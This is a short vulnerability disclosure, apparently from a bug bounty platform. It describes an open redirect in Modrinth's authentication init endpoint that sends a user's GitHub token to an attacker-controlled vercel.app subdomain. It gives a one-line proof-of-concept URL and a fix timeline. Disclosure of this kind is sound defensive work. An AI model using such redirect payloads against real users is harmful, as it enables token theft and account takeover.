Account Takeover in modrinth/labrinth

Valid

Reported on

Oct 15th 2022

Description

A malicious actor can setup a website on vercel.app with the vercel.app domain, after that, they can change the subdomain to something containing modrinth, This will allow a open redirect on https://api.modrinth.com/v2/auth/init?url=ATTACKER_URL, allowing stealing the github token which allows full account takeover.

Proof of Concept

https://api.modrinth.com/v2/auth/init?url=https://test-modrinth.vercel.app/api/hello

Impact

This vulnerability is capable of full account takeover, the user can reset the token of their account but the attacker will have access to the users account until then.

We are processing your report and will contact the modrinth/labrinth team within 24 hours. a year ago

A modrinth/labrinth maintainer has acknowledged this report a year ago

Emma Alexia validated this vulnerability a year ago

ZeoNight has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Emma Alexia marked this as fixed in Not applicable with commit 07edb9 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

Emma Alexia published this vulnerability a year ago

to join this conversation